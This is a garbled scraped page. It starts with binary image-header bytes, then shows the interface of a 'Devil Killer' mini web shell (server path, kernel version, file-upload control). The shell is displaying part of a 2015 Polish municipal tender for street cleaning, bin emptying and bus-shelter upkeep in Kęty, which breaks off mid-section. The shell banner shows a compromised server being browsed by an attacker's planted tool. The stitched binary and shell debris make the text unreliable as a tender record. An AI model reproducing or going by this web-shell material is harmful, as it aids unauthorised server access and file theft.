JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20150211/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20150211/30306-N-2015.html

<p class="kh_header"><b>Kęty: Oczyszczanie Gminy wraz z utrzymaniem i opróżnianiem koszy ulicznych ze śmieci 
i utrzymaniem wiat i przystanków autobusowych w 2015 r. - etap II</b><br>
<b>Numer ogłoszenia: 30306 - 2015; data zamieszczenia: 11.02.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Kęty , Rynek 7, 32-650 Kęty, woj. małopolskie, tel. 33 844-76-00, faks 33 844 76 60.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kety.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Oczyszczanie Gminy wraz z utrzymaniem i opróżnianiem koszy ulicznych ze śmieci 
i utrzymaniem wiat i przystanków autobusowych w 2015 r. - etap II.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> W ramach zamówienia należy wykonać:
Bieżące (codzienne) oczyszczanie polegające na oczyszczaniu ze śmieci, kurzu, liści, trawy, chwastów i mchu rosnącego pomiędzy płytkami, kostką brukową, przy obrzeżach i krawężnikach z następujących miejsc:
- kładka dla pieszych wraz z dojściem przy moście na ul. Głowackiego w Kętach,
- chodniki na moście w ciągu ul. Wszystkich Świętych w Kętach,
- chodnik przylegający do placu zabaw przy ul. Wszystkich Świętych w Kętach,
- chodniki i teren przyległy do budynku administracyjnego Urzędu Gminy przy ul. Kilińskiego 1 w Kętach,
- chodnik łączący ul. Wszystkich Świętych z ul. Ogrodową w Kętach,
- parkingi przy ul. Sienkiewicza, u zbiegu ul. Spacerowej i Sobieskiego, ul. Fabrycznej (rejon ronda), parking przy ul. Klasztornej
- działki gminne wokół ronda na ul. Krakowskiej w Kętach wraz z przyległymi trawnikami i chodnikami,
- chodnik w ciągu ulicznym obwodnicy zachodniej Kęt - ul. Spacerowej (bez utrzymania zimowego), 
- chodnik w ciągu ul. Spacerowej (od os. Nad Sołą do ul. Sobieskiego),
- chodnik w ciągu Al. Wojska Polskiego (bez utrzymania zimowego),
- chodniki od strony Rynku, ul. Ludowiki, ul. Jana Kantego, przylegające do budynku Urzędu Gminy Kęty - Rynek 7 (wyłącznie utrzymanie zimowe)
- Rynek w Kętach: tj. płyta Rynku oraz chodniki wokół Rynku przyległe do jezdni - oczyszczanie ze śmieci i liści terenów zieleni na płycie Rynku oraz na skwerach na tzw. wysokich chodnikach, skwer przy ul. Kościuszki przylegający do Rynku, oraz wysokie chodniki
- postój TAXI przy ul. Świętokrzyskiej w Kętach,
- skwery i parkingi wraz z przyległymi chodnikami przed dawną przychodnią BEFADO 
i przy ośrodku zdrowia ul. Sobieskiego w Kętach,
- Aleja Cmentarna od ul. Mickiewicza do ul. Cmentarnej w Kętach,
- działka gminna o nr ew. 4138/2 zlokalizowana przy ul. Klasztornej między Klasztorem oo. Franciszkanów Reformatów i Klasztorem Zgromadzenia Sióstr Zmartwychwstania Pańskiego wraz z przylegającym chodnikiem,
- chodnik przylegający do działki gminnej zlokalizowanej od strony wschodniej budynku przychodni zdrowia przy ul. Sobieskiego, 
- tereny dworca autobusowego (mała i duża pętla) przy ul. Sienkiewicza w Kętach wraz trawnikami i ciągami pieszymi przylegającymi do tych obiektów,
- chodniki przylegające do działki nr 2386/16 przy ul. 3 Maja w Kętach (na wjeździe na os. Wyszyńskiego),
- deptak z przyległymi trawnikami (do torowiska z jednej strony i do 1 m z drugiej strony) biegnący od ul. Kościuszki do ul. Legionów wzdłuż toru kolejowego w Kętach wraz
 z przylegającym terenem działki nr 2030,
- skwery wraz z przyległymi chodnikami przy ul. Żwirki i Wigury w Kętach i od strony północnej bud. nr 1A (dawna Jubilatka) oraz chodniki przylegające od strony wschodniej budynku,
- ścieżka obok Szkoły Podstawowej Nr 2 w Kętach łącząca ul. Wyspiańskiego z os. 700-lecia wraz z przyległymi: rowem i trawnikami; droga dochodząca do w/w ścieżki od ul. Żwirki 
i Wigury (dz. nr 2361/2 obok piekarni),
- chodnik na os. 700-lecia obok sklepu Opti prowadzący w stronę ZSG nr 2 
- skwery i parking wraz z przyległymi chodnikami od GOPS-u do zbiegu ulic Żwirki i Wigury z ul. Wyspiańskiego w Kętach,
- chodniki po obu stronach ul. Legionów na odcinku od ul. Sobieskiego do przejazdu kolejowego oraz od przejazdu kolejowego (prawa strona) na łuku skrętu w kierunku os. Nad Sołą,
- chodnik na ul Sobieskiego - odcinek od ul. Kleparz do ul. Legionów (po stronie pogotowia)
- chodniki wraz z zieleńcami u zbiegu ul. Legionów i Kleparz w Kętach,
- chodnik na odcinku od wjazdu w stronę przedszkola do hali sportowej na os. Nad Sołą 
w Kętach wraz z chodnikami przylegającymi do parkingu przy OSiR (pętla przy basenie)
- chodnik przylegający do działki nr 4351/2 przy ul. Młodzieży Polskiej (prawa strona) od nieruchomości nr 6 do skrzyżowania z ul. Świętokrzyską w Kętach,
- chodniki i parking (wzdłuż obiektów sportowych) przy ulicy łączącej ul. Młodzieży Polskiej 
z ul. Sobieskiego w Kętach 
- chodniki na moście drogowym na rzece Soła w ciągu ulic Sobieskiego - Partyzantów w Kętach wraz z dojściami do mostu: od strony wschodniej mostu od drogi łączącej ul. Sobieskiego z ul. Młodzieży Polskiej do pierwszych posesji przy ul. Partyzantów po stronie zachodniej mostu,
- chodniki przy ulicach: Partyzantów wraz z parkingiem naprzeciw OSP, Żeromskiego, Szkolnej przylegające do parku w dzielnicy Podlesie, 
- chodnik wzdłuż ul. Partyzantów do skrzyżowania z ul. Szkotnia Prawa wraz z parkingami przy kościele
- chodnik przy ulicy Św. M. Kolbe w Kętach na odcinku leśnym - ok. 150 mb,
- most na Uldze w ciągu ul. J. Kantego na granicy Kęt i Nowej Wsi (chodniki i jezdnia),
- utrzymanie w czystości terenu będącego własnością Gminy Kęty a wykorzystywanego jako ciąg pieszy pomiędzy ul. Oświęcimską a ul. Bolesława Prusa w Nowej Wsi o dł. ok. 110 mb (zlokalizowany na działkach o nr ew. 1257, 1253),
- chodnik w Bielanach wzdłuż drogi wojewódzkiej o dł. ok. 320 mb; w miesiącach: V, VI, VII, VIII, IX wykaszanie trawy wzdłuż wskazanego chodnika do szer. ok. 1m od jego krawędzi po obu stronach wraz z usunięciem skoszonej trawy.
- ul. Franciszkańska (chodnik, ścieżka rowerowa) - bez utrzymania zimowego 
Na w/w terenach do obowiązków wykonawcy należy również bieżące (codzienne) zimowe utrzymanie obsługiwanych terenów, w tym: odśnieżanie i zapobieganie gołoledzi na ciągach pieszych i chodnikach (posypywanie zabezpieczonym we własnym zakresie piaskiem lub innym materiałem zaakceptowanym przez Zamawiającego) z bezwzględnym wyeliminowaniem soli. 
Do odśnieżania należy używać odpowiedniego sprzętu mechanicznego nie powodującego niszczenia terenów zieleni przyległych do odśnieżanych ciągów pieszych i chodników.

Oczyszczanie wodościeków przyulicznych wraz z kratkami wodościekowymi 
z naniesionego osadu, ziemi, liści oraz z rosnącej trawy i chwastów, trzykrotnie w roku,
w miesiącach: V, VII, X:
Kęty:
- wodościek przyuliczny w ciągu ul. Kęckie Góry Południowe (do łącznika odchodzącego do 
ul. Widok, ok. 564 mb), 
- wodościek przyuliczny w ciągu ul. Żeromskiego (ok. 656 mb), 
- wodościek przyuliczny w ciągu ul. Czajki (ok. 483 mb)
Bulowice:
- wodościek przyuliczny w ciągu ul. Nad Brzegiem (ok. 325 mb)
2a) Dwukrotnie w miesiącach: V i X:
Kęty: 
- rów wyłożony betonowymi płytami ażurowymi w ciągu drogi odchodzącej od ul. Partyzantów na os. Wrzosowe (obok remizy OSP) - ok. 72mb, 
- wodościek przy ul. Szkolnej w Kętach (ok. 75 mb),
- wodościek przyuliczny w ciągu ul. Stawowej w Kętach (ok. 320 mb)
- wodościek przyuliczny w ciągu ul. Szkotnia Prawa w Kętach (ok. 365 mb)
Bulowice:
- wodościek przyuliczny w ciągu ul. Roczyńskiej (ok.102 mb) 
- wodościek przyuliczny w ciągu ul. Witkowskiej (ok. 157 mb), 
- wodościek przyuliczny w ciągu ul. Olszyny (ok. 76 mb), 
- wodościek przyuliczny w ciągu ul. Św. Brata Alberta (ok. 315 mb), 
- wodościek przyuliczny w ciągu ul. Zielonej (ok. 83 mb) 
Witkowice:
- wodościek przyuliczny w ciągu ul. Granica (na odcinku leśnym, ok. 21 mb),
- wodościek przyuliczny w ciągu ul. Dworskiej do skrzyżowania z ulicą Stara Droga (ok. 83 mb), 
- wodościek przyuliczny w ciągu ul. Lipowej (ok. 110 mb)
2b) Jednokrotnie w miesiącu: V
Kęty:
- wodościek przyuliczny w ciągu łącznika odchodzącego od ul. Kęckie Góry Południowe do ul. Widok (od posesji nr 23) - ok. 247 mb, 
- wodościeki przyuliczne w ciągu ul. Bulowskiej (ok. 150 mb),
Bielany i Łęki: 
- wodościek przyuliczny w ciągu ul. Łęckiej w Bielanach i ul. Świerkowej w Łękach 
(ok. 1100mb)
Malec
- wodościek przyuliczny w ciągu ul. Widokowej (ok. 100 mb),
- wodościek przyuliczny w ciągu ul. Górka (ok. 150 mb)
- wodościek przyuliczny w ciągu ul. Wesołej (ok. 120 mb)
2c) Jednokrotnie w miesiącu: XI
Kęty:
- wodościek przyuliczny w ciągu ul. Kęckie Góry Południowe (do łącznika odchodzącego do 
ul. Widok, ok. 564 mb),

Utrzymanie i opróżnianie koszy ulicznych:
- bieżące opróżnianie koszy ze śmieci zlokalizowanych w miejscach publicznych na terenie Gminy (nie mniej niż 350 sztuk) uzależnione od napełnienia kosza, wraz z podrzuconymi przy koszu na śmieci workami z odpadami komunalnymi, w okresach nie dłuższych niż co 2 tygodnie. Przyjmuje się, że wypełnienie kosza w 3/4 jego objętości jest tym dniem, w którym kosz musi być opróżniony. 
- bieżące (codzienne) opróżnianie ze śmieci wszystkich koszy ulicznych zabudowanych na dworcu autobusowym w Kętach, a także dbanie o ich czystość i stan techniczny,
- bieżące opróżnianie koszy ulicznych zabudowanych w parkach i placach zabaw należących 
do Gminy Kęty. Opróżnianie koszy w parku w dzielnicy Podlesie należy wykonywać bez wjazdu pojazdami mechanicznymi na ścieżki parkowe;
- sporządzenie (w terminie do 30.04.2015 r.) wykazów - inwentaryzacji opróżnianych koszy ulicznych ze śmieci z uwzględnieniem rodzaju kosza: metalowy (typ) lub plastikowy oraz sposobu mocowania (na słupku, w ogrodzeniu, znaku, płyta chodnika itp.),	
- poprawa mocowania kosza w podłożu i na słupku oraz utrzymanie w czystości terenu wokół kosza (szczególnie podczas opróżniania), wykonywanie drobnych napraw koszy,

- wiosenne (kwiecień) malowanie koszy metalowych (kolor zielony) a dalej konserwacja - wg potrzeb,
- pisemne, na bieżąco, zgłaszanie Zamawiającemu dewastacji, kradzieży, złego stanu technicznego koszy z podaniem ich rodzaju i lokalizacji, 
- trzykrotne w ciągu roku, w miesiącach: IV, VI, VIII mycie i dezynfekcja koszy (wewnątrz i na zewnątrz kosza) oraz wykoszenie trawy rosnącej wokół kosza.

Sprzątanie i utrzymanie całoroczne wiat i przystanków autobusowych, wg wykazu stanowiącego załącznik nr 8 do SIWZ:
- bieżące sprzątanie ze śmieci, nalepionych plakatów wiat i przystanków autobusowych, 
- odśnieżanie i zapobieganie gołoledzi na przystankach autobusowych, chodnikach przylegających do przystanków, zatok autobusowych
- bieżące usuwanie śniegu (po intensywnych opadach śniegu), lodu i nawisów lodowych 
z dachów przystanków i wiat przystankowych,
- bieżące usuwanie liści, gałęzi, nieczystości z dachów przystanków i wiat przystankowych oraz udrażnianie odpływu wody z ich rynien i rur spustowych,
- pięciokrotne w ciągu roku, w miesiącach: V, VI, VII, VIII, IX wykaszanie terenów wokół wiat przystankowych, zatok autobusowych oraz słupków przystankowych na szer.  ~1,5 m, koszenie traw w urządzonych donicach na przystankach murowanych, usunięcie skoszonej trawy, usunięcie chwastów i mchu rosnącego pomiędzy płytkami lub kostką brukową na chodnikach wzdłuż całych zatok autobusowych, w zatokach autobusowych oraz  wokół wiat przystankowych i słupków przystankowych.
- dwukrotne w roku, w miesiącach: IV, IX mycie wiat przystankowych i zabudowanych ławeczek oraz usunięcie nalepionych plakatów, ogłoszeń itp., 

Bieżące sprzątanie terenu pod tablicami ogłoszeń zlokalizowanych na terenie gminy 
z zerwanych ogłoszeń, plakatów itp. oraz dwukrotnie w ciągu roku, w miesiącach: V i VIII oczyszczanie urzędowych tablic ogłoszeń zlokalizowanych na terenie miasta, wg załącznika nr 7 do SIWZ. 
- poprawa mocowania w podłożu zlokalizowanych na terenie gminy tablic ogłoszeń oraz utrzymanie w czystości terenu wokół tablic, wykonywanie drobnych napraw 
Przed przystąpieniem do prac w miesiącach V i VIII należy na tablicach zawiesić powiadomienie o terminie czyszczenia tablicy na 2 tygodnie przed ich wykonaniem.

Usuwanie nieestetycznych kwiatów i wypalonych zniczy pozostałych po świętach okolicznościowych, a znajdujących się w miejscach zwyczajowo przyjętych na Rynku.
Sprzątanie terenów publicznych w rejonach obiektów sakralnych wykorzystywanych jako miejsca handlowe podczas uroczystości odpustowych w Gminie Kęty w 2015 r. w następujących miejscach i terminach:

Miasto KĘTY:
Parafia św. Małgorzaty i Katarzyny	-   lipiec i październik
Parafia N.S.P.J. - os. 700-lecia		-   czerwiec
Parafia - Podlesie			-   1- sza niedziela po Wielkanocy
-   1- sza niedziela po Bożym Ciele
Klasztor Ojców Reformatów		-  31.07 - 2.08


SOŁECTWA:
Bulowice 		- kwiecień 	- św. Wojciecha
Witkowice 		- maj		  św. Urbana
- wrzesień 	- św. Michała
Nowa Wieś 		- sierpień	- św. Maksymiliana Marii Kolbego 
Bielany 		- maj 		- św. Macieja
- czerwiec
Malec			- październik 	- św. J. Kantego

Wywóz zebranych nieczystości z terenów objętych w/w pracami (wraz z pokryciem wszelkich kosztów) do RIPOK-u (Regionalnej instalacji do przetwarzania odpadów komunalnych) zgodnie z Wojewódzkim Planem Gospodarki Komunalnej.
Dostarczenie czystych odpadów zielonych do kompostowni. 
Prace związane z zamiataniem, czyszczeniem, zbieraniem zabrudzeń, myciem oraz odśnieżaniem należy przeprowadzać przy użyciu specjalistycznego, wielofunkcyjnego pojazdu mechanicznego wyposażonego w podzespoły i oprzyrządowanie:
- ręczny wąż ssawny do efektywnego zbierania drobnych zanieczyszczeń z zieleńców, miejsc wokół studzienek i przy krawężnikach,
- myjka ciśnieniowa do mycia i oczyszczania powierzchni trudno dostępnych z zabrudzeń,
- szczotki tarczowe z układem dysz natryskowych do zwilżania i wiązania pyłu zamiatanej, czyszczonej powierzchni placów, chodników i parkingów,
- szczotki do odmiatania śniegu oraz pług do jego odgarniania i przerzucania,
- piaskarka do posypywania placów i chodników w okresie zimowym
Dopuszczalny całkowity ciężar urządzenia nie może przekraczać 2500 kg.
Ponadto Wykonawca ma obowiązek dysponować następującymi samochodami przeznaczonymi do zbierania i transportu odpadów: śmieciarką zabudowaną na podwoziu samochodu ciężarowego - 2 szt., samochodem skrzyniowym - 1 szt. oraz kosą żyłkową spalinową do wykaszania traw. 
W miejscach gdzie użycie specjalistycznego pojazdu nie jest możliwe ze względów technicznych Zamawiający dopuszcza wykonywanie ręczne prac związanych z zamiataniem, czyszczeniem, zbieraniem zabrudzeń, myciem oraz odśnieżaniem.
Wykonawca zobowiązany jest do zdobycia wszelkich informacji, (w tym dokonanie wizji lokalnej w terenie objętym zamówieniem), które mogą być konieczne do prawidłowej wyceny wartości usługi gdyż wyklucza się możliwość roszczeń Wykonawcy związanych z błędnym skalkulowaniem ceny lub pominięciem elementów niezbędnych do wykonania umowy.
Zamawiający nie dopuszcza składania ofert częściowych.
Zamawiający nie przewiduje możliwości udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 ustawy Prawo zamówień publicznych. 
Zamawiający nie dopuszcza składania ofert wariantowych.
Informacje na temat podwykonawstwa:
Zamawiający żąda wskazania przez Wykonawcę w ofercie części zamówienia, której wykonanie zamierza powierzyć podwykonawcom. Zakres zamówienia przewidziany do wykonania przez podwykonawców należy wskazać w ofercie na druku stanowiącym załącznik nr 5 do niniejszej SIWZ.
Jeżeli zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby Wykonawca powoływał się, na zasadach określonych w art. 26 ust. 2b, w celu wykazania spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1, Wykonawca jest obowiązany wykazać Zamawiającemu, iż proponowany inny podwykonawca lub Wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.60.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 10.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli wykonawca posiada wymagane prawem zezwolenie na transport odpadów komunalnych.
Ocena spełnienia warunku zostanie dokonana na podstawie informacji zawartych w poniższym dokumencie: zezwolenie na transport odpadów wydane, w drodze decyzji, przez starostę właściwego ze względu na miejsce siedziby lub zamieszkania transportującego odpady w myśl ustawy z dnia 27 kwietnia 2001 r. o odpadach (Dz. U. z 2010 r. Nr 185, poz. 1243 z późn. zm.)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek ten został spełniony jeżeli Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał co najmniej dwie usługi odpowiadające wielkością i rodzajem usłudze stanowiącej przedmiot zamówienia.
Za realizowane zamówienie odpowiadające swoim rodzajem usłudze stanowiącej przedmiot zamówienia rozumieć się będzie świadczenie usługi w zakresie utrzymania w czystości terenów publicznych, wykonywania prac porządkowych, a za porównywalną wielkość - usługa o wartości brutto nie mniejszej niż 100.000,00 zł brutto.
Ocena spełnienia warunku zostanie dokonana na podstawie złożonego wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych usług w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie.
Zamawiający określa, aby w wykazie usług - załącznik nr 4 do SIWZ, znalazły się tylko usługi w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia, określone w cz. V pkt 1 ppkt b) SIWZ.
Dowody dotyczące usług wymienionych w w/w wykazie określające czy zostały wykonane należycie, to: - poświadczenie albo - oświadczenie wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa powyżej. Dowody, o których mowa powyżej, są wskazane w §1 ust. 2pkt 1 i 3 Rozporządzenia Prezesa Rady Ministrów z dnia 19.02.2013 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz. U. z dnia 19.02.2013 r., poz. 231). W przypadku, gdy Zamawiający jest podmiotem, na rzecz którego usługi wskazane w ww. wykazie - załącznik nr 4 do SIWZ, zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania dowodów, o których mowa powyżej.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli wykonawca wykaże, że dysponuje:
1) specjalistycznym, wielofunkcyjnym pojazdem mechanicznym wyposażonym w podzespoły 
i oprzyrządowanie:
- ręczny wąż ssawny do efektywnego zbierania drobnych zanieczyszczeń z zieleńców, miejsc wokół studzienek i przy krawężnikach,
- myjkę ciśnieniową do mycia i oczyszczania powierzchni trudno dostępnych z zabrudzeń,
- szczotki tarczowe z układem dysz natryskowych do zwilżania i wiązania pyłu zamiatanej, czyszczonej powierzchni placów, chodników i parkingów,
- szczotki do odmiatania śniegu oraz pług do jego odgarniania i przerzucania,
- piaskarkę do posypywania placów i chodników w okresie zimowym
Dopuszczalny całkowity ciężar urządzenia nie może przekraczać 2500 kg.
2) Ponadto Wykonawca ma obowiązek dysponować następującymi samochodami przeznaczonymi do zbierania i transportu odpadów: śmieciarką zabudowaną na podwoziu samochodu ciężarowego - 2 szt., samochodem skrzyniowym - 1 szt. oraz co najmniej jedną kosą żyłkową spalinową.
Wykaz sprzętu stanowi załącznik nr 9 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli Wykonawca przedstawi opłaconą polisę, 
a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej w przedmiotem zamówienia na kwotę minimum 100.000,00 złotych (w przypadku braku potwierdzenia w treści polisy jej opłaty, należy załączyć dokumenty, które będą ten fakt potwierdzać).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

